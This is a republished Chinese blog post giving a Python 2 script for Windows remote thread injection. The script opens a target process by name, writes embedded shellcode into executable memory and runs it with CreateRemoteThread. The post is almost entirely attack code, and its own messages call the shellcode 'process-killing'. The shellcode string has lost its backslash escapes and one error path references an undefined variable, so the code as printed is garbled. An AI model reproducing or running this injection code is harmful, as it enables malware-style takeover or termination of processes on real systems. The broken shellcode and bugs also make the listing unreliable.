概述
用python来实现远程线程注入,该例子是测试相关工作的。参数为要注入的进程的名字:
import sys
import ctypes
from ctypes import *
PAGE_EXECUTE_READWRITE = 0x00000040
PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF )
VIRTUAL_MEM = ( 0x1000 | 0x2000 )
kernel32 = windll.kernel32
pName = sys.argv[1]
if not sys.argv[1]:
print "Code Injector: ./code_injector.py <name to inject>"
sys.exit(0)
shellcode =
"x31xd2xb2x30x64x8bx12x8bx52x0cx8bx52x1cx8bx42"
"x08x8bx72x20x8bx12x80x7ex0cx33x75xf2x89xc7x03"
"x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x31xedx8b"
"x34xafx01xc6x45x81x3ex46x61x74x61x75xf2x81x7e"
"x08x45x78x69x74x75xe9x8bx7ax24x01xc7x66x8bx2c"
"x6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x68x79x74"
"x65x01x68x6bx65x6ex42x68x20x42x72x6fx89xe1xfe"
"x49x0bx31xc0x51x50xffxd7";
code_size = len(shellcode)
TH32CS_SNAPPROCESS = 0x00000002
class PROCESSENTRY32(ctypes.Structure):
_fields_ = [("dwSize", ctypes.c_ulong),
("cntUsage", ctypes.c_ulong),
("th32ProcessID", ctypes.c_ulong),
("th32DefaultHeapID", ctypes.c_ulong),
("th32ModuleID", ctypes.c_ulong),
("cntThreads", ctypes.c_ulong),
("th32ParentProcessID", ctypes.c_ulong),
("pcPriClassBase", ctypes.c_ulong),
("dwFlags", ctypes.c_ulong),
("szExeFile", ctypes.c_char * 260)]
def getProcPid(procName):
CreateToolhelp32Snapshot = ctypes.windll.kernel32.CreateToolhelp32Snapshot
Process32First = ctypes.windll.kernel32.Process32First
Process32Next = ctypes.windll.kernel32.Process32Next
CloseHandle = ctypes.windll.kernel32.CloseHandle
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
pe32 = PROCESSENTRY32()
pe32.dwSize = ctypes.sizeof(PROCESSENTRY32)
if Process32First(hProcessSnap,ctypes.byref(pe32)) == False:
return
if pe32.szExeFile == procName:
CloseHandle(hProcessSnap)
return pe32.th32ProcessID
while True:
#yield pe32 #save the pe32
if Process32Next(hProcessSnap,ctypes.byref(pe32)) == False:
break
if pe32.szExeFile == procName:
CloseHandle(hProcessSnap)
return pe32.th32ProcessID
CloseHandle(hProcessSnap)
procPid = getProcPid(pName)
print procPid
# Get a handle to the process we are injecting into.
h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, procPid )
if not h_process:
print "[*] Couldn't acquire a handle to PID: %s" % pid
sys.exit(0)
# Allocate some space for the shellcode
arg_address = kernel32.VirtualAllocEx( h_process, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE)
# Write out the shellcode
written = c_int(0)
kernel32.WriteProcessMemory(h_process, arg_address, shellcode, code_size, byref(written))
# Now we create the remote thread and point it's entry routine
# to be head of our shellcode
thread_id = c_ulong(0)
if not kernel32.CreateRemoteThread(h_process,None,0,arg_address,None,0,byref(thread_id)):
print "[*] Failed to inject process-killing shellcode. Exiting."
sys.exit(0)
print "[*] Remote thread successfully created with a thread ID of: 0x%08x" % thread_id.value
参考:
1. python 灰帽子
2. http://blog.csdn.net/chollima/article/details/7669522
3.http://www.exploit-db.com/exploits/28996/
最后
以上就是欣慰牛排为你收集整理的python 远程线程注入代码的全部内容,希望文章能够帮你解决python 远程线程注入代码所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复